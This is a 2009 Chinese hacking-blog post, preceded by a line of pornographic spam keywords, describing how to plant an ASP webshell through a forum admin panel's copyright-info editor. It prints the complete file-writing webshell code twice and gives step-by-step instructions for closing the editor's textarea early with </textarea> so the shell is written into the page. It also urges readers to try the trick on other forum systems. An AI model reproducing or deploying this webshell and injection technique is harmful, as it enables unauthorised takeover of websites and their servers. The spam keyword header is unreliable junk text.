亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

編輯器代碼逃逸漏洞 by蚊蟲(chóng)原創(chuàng)

  發(fā)布時(shí)間:2009-09-29 20:14:35   作者:佚名   我要評(píng)論
幾天 冰刀丟給我一個(gè)論壇 這幾天無(wú)聊 隨便看看 看看能不能拿到webshell

好 版權(quán)信息 把他變成小馬

成功保存

但是沒(méi)有被執(zhí)行..

應(yīng)該是馬的問(wèn)題

馬兒不行 當(dāng)然是更換了 這不 怪事出現(xiàn)了 你看..

看 命令成功完成! 非法操作!       這這么跑出來(lái)了?????????????

真是怪了難道我的馬兒真的長(zhǎng)褪了?

研究了一下中以明白是怎么回事了..

看看我的馬兒的代碼,注意紅色的標(biāo)記
<body>
<form method=post>
<input type=text name=syfdpath value="<%=replace(server.mappath(Request.ServerVariables("SCRIPT_NAME")),".","sb.") %>" size="53">
<input type=submit value=保存>&nbsp;&nbsp; 蚊蟲(chóng)專用
<textarea name=cyfddata rows="11" cols="90"></textarea>
<%
dim objFSO
dim fdat
dim objCountFile
on error resume next
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if Trim(request("syfdpath"))<>"" then
fdata = request("cyfddata")
Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
objCountFile.Write fdata
if err =0 then %>
<p>命令成功完成!
<% else %>
非法操作!
<%
end if
err.clear
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
%>
</form>

再看看網(wǎng)頁(yè)的源代碼,注意橙色的標(biāo)記

<td width="50%" class="td1"> <U>論壇版權(quán)信息</U></td>
<td width="50%" class="td1" valign=top>
<textarea name="Copyright" cols="50" rows="5" id=TdCopyright>

<style>
body{
FILTER:progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#808080,endColorStr=#000);
color:#FFF;
font-size:9pt
}
</style>
<body>
<p> </p>
<p> </p>
<form method=post>
<input type=text name=syfdpath value="<%=replace(server.mappath(Request.ServerVariables("SCRIPT_NAME")),".","sb.") %>" size="53">
<input type=submit value=保存>&nbsp;&nbsp; 蚊蟲(chóng)專用
<textarea name=cyfddata rows="11" cols="90"></textarea>
<%
dim objFSO
dim fdat
dim objCountFile
on error resume next
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if Trim(request("syfdpath"))<>"" then
fdata = request("cyfddata")
Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)
objCountFile.Write fdata
if err =0 then %>
<p>命令成功完成!
<% else %>
非法操作!
<%
end if
err.clear
end if
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
%>
</form></textarea>
<a href="javascript:admin_Size(-5,'TdCopyright')">

看不明白?

我來(lái)解釋一下

看網(wǎng)頁(yè)的源代碼

<textarea name="Copyright" cols="50" rows="5" id=TdCopyright>

這是文本框的開(kāi)頭標(biāo)記

爾我的小馬里面又有一個(gè)文本框結(jié)束的標(biāo)記

<textarea name=cyfddata rows="11" cols="90"></textarea>

所以瀏覽器就把

</textarea>以下的代碼解釋為文本框以外的位置了...

呵呵 這就相當(dāng)于把 </textarea>以下的代碼 寫進(jìn)了這個(gè)編輯頁(yè)面里面...

明白了吧

這對(duì)我們很有用處

使用

在小馬最上面加上</textarea>

保存

然后重新編輯

這時(shí) 我們的小馬已經(jīng)被'寫入"編輯頁(yè)面

剩下的就不用說(shuō)了吧.....哈哈 淫蕩去咯....

ps:不光是動(dòng)網(wǎng) 還有其他的系統(tǒng)都有類似的漏洞

ps:不要吧思維光死停留在這里..想想我們可以.....

PS:有可能運(yùn)行不了,這取決于你的馬.

相關(guān)文章

最新評(píng)論